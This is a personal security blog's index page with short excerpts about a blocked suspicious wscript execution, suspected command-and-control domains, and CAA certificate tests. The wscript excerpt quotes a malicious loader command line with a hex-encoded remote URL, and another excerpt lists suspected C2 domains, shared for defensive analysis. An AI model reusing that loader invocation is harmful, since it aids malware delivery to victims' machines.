Blog

About:me

I’m a dedicated father and friend. I enjoy technology immensely and feel extremely lucky to have been born at the right place & during the right time. I started out working for the University of Dayton as a co-op student in computer science. I fell in love with the concept of networking – this wasContinue reading “About:me”

Examining strange wscript behavior

We use cylance with script control, and periodically I review the outliers that have been blocked. I came across this one recently: wscript.exe “C:ProgramData{18E0DD83-92A2-5745-1464-C9078E2642C9}domo.txt” “68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e6574” “//B” “//E:jscript” “–IsErIk” I took a copy of the domo.txt script and uploaded to VT: I also ran that hex string through a hex decoder: 68747470733a2f2f643237346571343163333972326e2e636c6f756466726f6e742e6e = https://d274eq41c39r2n.cloudfront.net According toContinue reading “Examining strange wscript behavior”

Update: f5d599a39d02caef1984e95fdc606f838893ffc5.xyz

Unfortunately, as of 16 April 2019, I’m still seeing traffic on this domain. Here are some others I’m seeing: dfbfb63dcaff96fbe9616fb806e4799f.com8d46980d994cc618aeed127df1b5c86d8acd86ce.info07bf396c25d9a624281c97752aee0247e4229b84.xyz07bf396c25d9a624281c97752aee0247e4229b84.com07bf396c25d9a624281c97752aee0247e4229b84.infod234304f57772cf6be78ab6c24a65c91ce896fff.xyzd234304f57772cf6be78ab6c24a65c91ce896fff.comd234304f57772cf6be78ab6c24a65c91ce896fff.info8d46980d994cc618aeed127df1b5c86d8acd86ce.xyzcbb0c7dae8061aca012b8a910062c33f3642e383.comcbb0c7dae8061aca012b8a910062c33f3642e383.xyzcbb0c7dae8061aca012b8a910062c33f3642e383.info

f5d599a39d02caef1984e95fdc606f838893ffc5.xyz

I’m now the proud owner of these domains: f5d599a39d02caef1984e95fdc606f838893ffc5.com 8d46980d994cc618aeed127df1b5c86d8acd86ce.xyz 10bdc75ab2f0486f008dbdd8f1b0a38d7399598e.xyz Why would I purchase such strange looking domains you ask? It all started long ago, while working for my enterprise. I saw some activity flagged by OpenDNS / Umbrella for some CnC traffic bound for these domains. It was being blocked but as IContinue reading “f5d599a39d02caef1984e95fdc606f838893ffc5.xyz”

CAA Test Results

As promised, I’ve been testing Certification Authority Authorization (CAA) with some Certificate Authorities and here’s what I found so far: Amazon Certificate Manager (ACM) It does not appear they honor the IODEF since I didn’t receive an email. Let’s Encrypt appears to also block issuance: Let’s Encrypt (using lego) 2018/12/29 16:44:30 Could not obtain certificatesContinue reading “CAA Test Results”

Loading…

Something went wrong. Please refresh the page and/or try again.


Follow My Blog

Get new content delivered directly to your inbox.

%d bloggers like this: